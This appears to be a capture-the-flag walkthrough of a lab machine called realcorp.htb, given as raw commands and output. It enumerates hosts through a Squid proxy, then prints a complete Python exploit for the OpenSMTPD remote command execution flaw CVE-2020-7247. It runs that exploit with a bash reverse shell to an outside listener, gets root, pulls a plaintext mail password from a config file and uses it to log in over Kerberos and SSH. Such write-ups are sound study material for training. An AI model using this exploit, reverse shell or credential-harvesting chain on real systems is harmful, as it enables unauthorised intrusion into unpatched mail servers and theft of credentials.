sudo nmap -p- -T4 -A 10.10.10.224
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
| 256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_ 256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp open domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid:
|_ bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp open kerberos-sec MIT Kerberos (server time: 2021-05-12 16:47:12Z)
3128/tcp open http-proxy Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
http://10.10.10.224:3128/
Your cache administrator is j.nakazawa@realcorp.htb.
Generated Sun, 06 Jun 2021 18:59:47 GMT by srv01.realcorp.htb (squid/4.11)
$ echo 10.10.10.224 realcorp.htb | sudo tee -a /etc/hosts
gobuster dns -d realcorp.htb -r 10.10.10.224:53 -i -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: realcorp.htb
[+] Threads: 10
[+] Resolver: 10.10.10.224:53
[+] Show IPs: true
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
2021/06/06 19:17:45 Starting gobuster in DNS enumeration mode
===============================================================
Found: proxy.realcorp.htb [10.197.243.77]
Found: wpad.realcorp.htb [10.197.243.31]
===============================================================
2021/06/06 22:28:38 Finished
===============================================================
$ dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
ns.realcorp.htb. 259200 IN A 10.197.243.77
proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
ns.realcorp.htb. 259200 IN A 10.197.243.77
wpad.realcorp.htb. 259200 IN A 10.197.243.31
$ cat /etc/proxychains4.conf
... ...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128
$ proxychains -f /etc/proxychains4.conf nmap -sT -Pn -oN scans/proxy 10.197.243.31
Nmap scan report for wpad.realcorp.htb (10.197.243.31)
Host is up (0.12s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
464/tcp open kpasswd5
749/tcp open kerberos-adm
3128/tcp open squid-http
Nmap done: 1 IP address (1 host up) scanned in 120.63 seconds
$ echo 10.197.243.31 wpad.realcorp.htb | sudo tee -a /etc/hosts
$ proxychains -f /etc/proxychains4.conf curl http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 10.10.10.224:3128 ... 127.0.0.1:3128 ... 10.197.243.77:3128 ... 10.197.243.31:80 ... OK
function FindProxyForURL(url, host) {
if (dnsDomainIs(host, "realcorp.htb"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
return "DIRECT";
return "PROXY proxy.realcorp.htb:3128";
}
$ proxychains -f /etc/proxychains4.conf nmap -sT -sV -Pn 10.241.251.113
Nmap scan report for 10.241.251.113
Host is up (0.12s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
Service Info: Host: smtp.realcorp.htb
CVE-2020-7247 https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/
#!/usr/bin/env python3
import socket, time
import sys
if len(sys.argv) < 4:
print("usage: getshell.py <host> <port> <command>")
exit()
HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]
payload = b"""\r\n
#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except OSError as msg:
s = None
continue
try:
s.connect(sa)
except OSError as msg:
s.close()
s = None
continue
break
if s is None:
print("Could not open socket")
sys.exit(1)
with s:
data = s.recv(1024)
print('Received', repr(data))
time.sleep(1)
print('SENDING HELO')
s.send(b"helo test.com\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
time.sleep(1)
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"DATA\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(payload)
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"QUIT\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
print("Exploited")
s.close()
$ nc -lvnp 4444
$ proxychains -f /etc/proxychains4.conf python3 exploit.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.42/4444 <&1"'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 10.10.10.224:3128 ... 127.0.0.1:3128 ... 10.197.243.77:3128 ... 10.241.251.113:25 ... OK
Received b'220 smtp.realcorp.htb ESMTP OpenSMTPD\r\n'
SENDING HELO
RECIEVED b'250 smtp.realcorp.htb Hello test.com [10.241.251.1], pleased to meet you\r\n'
RECIEVED b'250 2.0.0 Ok\r\n'
RECIEVED b'250 2.1.5 Destination address valid: Recipient ok\r\n'
RECIEVED b'354 Enter mail, end with "." on a line by itself\r\n'
RECIEVED b'250 2.0.0 cfac7b55 Message accepted for delivery\r\n'
RECIEVED b'221 2.0.0 Bye\r\n'
Exploited
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.224] 55636
bash: cannot set terminal process group (77): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~#
root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null
# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60
# Set a default account
account default : realcorp
$ sudo apt install krb5-user
$ echo 10.10.10.224 srv01.realcorp.htb | sudo tee -a /ettc/hosts
comment out 10.10.10.224 realcorp.htb
$ sudo vi /etc/krb5.conf
/etc/krb5.conf
[libdefaults]
default_realm = REALCORP.HTB
[realms]
REALCORP.HTB = {
kdc = 10.10.10.224
}
[domain_realm]
srv01.realcorp.htb = REALCORP.HTB
$ kinit j.nakazawa
Password for j.nakazawa@REALCORP.HTB:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: j.nakazawa@REALCORP.HTB
Valid starting Expires Service principal
06/17/2021 10:27:22 06/18/2021 10:15:31 krbtgt/REALCORP.HTB@REALCORP.HTB
/etc/ssh/sshd_config
KerberosAuthentication yes
KerberosOrLocalPasswd [yes|no]
KerberosTicketCleanup yes
$ ssh j.nakazawa@10.10.10.224
Activate the web console with: systemctl enable --now cockpit.socket
Last failed login: Thu Jun 17 20:20:01 BST 2021 from 10.10.14.42 on ssh:notty
There were 11 failed login attempts since the last successful login.
Last login: Thu Jun 17 11:51:58 2021 from 10.10.14.73
[j.nakazawa@srv01 ~]$ cat user.txt
4f9570270b373359fdbf61c1a4312f04
[j.nakazawa@srv01 ~]$